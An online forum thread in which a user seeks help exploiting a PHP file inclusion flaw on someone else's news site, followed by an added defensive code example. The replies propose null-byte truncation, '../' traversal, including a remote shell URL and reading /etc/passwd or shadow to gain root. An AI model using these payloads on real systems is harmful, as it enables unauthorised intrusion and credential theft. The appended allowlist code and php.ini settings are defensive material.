
Exploit?


ghost's Avatar
0 0

I found a function that includes some page.

The page looks like:

http://www.site.com/news/news.php?id=abcd

It generates error:

Warning: main() [function.include]: Failed opening 'newsabcd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')

The source probably looks like:

include 'news' . $_GET['id'] . '.php';

So, I can't include my php file.

I tried googling for some help about htaccess that removes the php handler, but I didn't get any help.

Can you give me some help in that?

Don't do google links. If you wanna help me, help me ;)


lukem_95's Avatar
Member
0 0

have you tried null byte? %00 on either the end or the beginning of the GET variable


SySTeM's Avatar
-=[TheOutlaw]=-
20 0

try: ../pageyouwannainclude.ext%00

The ../ should get rid of "news", and the %00 will get rid of the default extension.


ghost's Avatar
0 0

when you use the %00 (poison null byte) does it change it to like \0 or \00? If so then that is because their server is filtering it, but you can also try like

page.php?file=abcd?getridofphpextension=

this will put whatever is being appended onto the include statement, into a get variable


ghost's Avatar
0 0

system_meltdown wrote: try: ../pageyouwannainclude.ext%00

The ../ should get rid of "news", and the %00 will get rid of the default extension.

Warning: main() [function.include]: Failed opening 'news../http://www.mysite.com/myfile.php\0.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

That is the error I get. I tried without 'http://' but I still get an error.

chislam:

http://www.site.com/news/news.php?id=%00

Warning: main() [function.include]: Failed opening 'news\0.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in


ghost's Avatar
0 0

I think system was referring to local file inclusions


SySTeM's Avatar
-=[TheOutlaw]=-
20 0

Indeed I was lol


ghost's Avatar
0 0

So, do you have any remote file inclusion ideas?


ghost's Avatar
0 0

ok so that means that it's filtering pnb's so try the method that i gave you lol


ghost's Avatar
0 0

Err, chislam, yours doesn't get rid of the stuff which it tacks onto the beginning of the string


ghost's Avatar
0 0

Try sticking a backslash at the start

I thought of that cause

markupnews\http://google.com

Works on firefox


ghost's Avatar
0 0

ah ok my bad, i didn't realize that it was putting things before it. my bad :(

anyways, if just putting http://yourshell.php?asdf=url doesn't work try putting ../http://yourshell.php?asdf=

or just grab a local file like system was referring to.


ghost's Avatar
0 0

Why would adding ../ help?

All that does is go up a directory in their filesystem


ghost's Avatar
0 0

I don't know, but it's worth a shot. Might not work, and probably won't but if it did, you wouldn't know.


lukem_95's Avatar
Member
0 0

wow my little reply sparked off all this :D

have you tried grabbing etc/passwd or shadow?

you might get lucky and be able to root it…


ghost's Avatar
0 0

Firstly, all of your adding query strings do not work on the file system, therefore you need something else to end the files

Secondly, until you can find a protocol which begins with news, perhaps RSS? Then you won't be able to hack this, sorry.


ghost's Avatar
0 0

lukem_95 wrote: wow my little reply sparked off all this :D

have you tried grabbing etc/passwd or shadow?

you might get lucky and be able to root it…

I can't go up in directory. I can't move from '/news/'

EDIT:

I made a subdomain on one site. news.mysite.com

I don't really need to get rid of php extension because my file is php.

I try http://www.site.com/news/news.php?id=.mysite.com/myfile

and I get error:

Warning: main() [function.include]: Failed opening 'news.mysite.com/myfile.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

Damn. I guess I need http:// in the beginning :(
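
Added example, not part of the thread and not the site's real code: the include pattern guessed in the first post next to a hardened form that maps the id through a fixed allowlist, so request data never reaches the path. NEWS_DIR, resolve_news_page() and the page ids are hypothetical names constructed for illustration.

```php
<?php
// Pattern guessed in the first post (request data is concatenated into the path):
//     include 'news' . $_GET['id'] . '.php';

// Hardened form: the request value only selects an entry from a fixed table.
// NEWS_DIR and the ids below are constructed for this example.
define('NEWS_DIR', __DIR__ . '/news_pages');

function resolve_news_page($id)
{
    $pages = array(
        '1'       => 'news1.php',
        '2'       => 'news2.php',
        'archive' => 'newsarchive.php',
    );
    // Arrays (?id[]=x), NUL bytes, "../" and URLs are all rejected here,
    // because none of them is a key of $pages.
    if (!is_string($id) || !array_key_exists($id, $pages)) {
        return null;
    }
    $base = realpath(NEWS_DIR);
    $path = ($base === false) ? false : realpath($base . '/' . $pages[$id]);
    // realpath() returns false for a missing file; the prefix check confirms
    // the resolved file is still under NEWS_DIR (for example, no symlink out).
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$id   = isset($_GET['id']) ? $_GET['id'] : '';
$page = resolve_news_page($id);
if ($page === null) {
    // Generic response: no include warning with path details is shown.
    header('HTTP/1.1 404 Not Found');
    exit('No such article');
}
include $page;
```

Independently of the code, `allow_url_include = Off` in php.ini (available since PHP 5.2) keeps include from fetching http:// URLs, and `display_errors = Off` keeps warnings like the ones quoted in the thread out of the response.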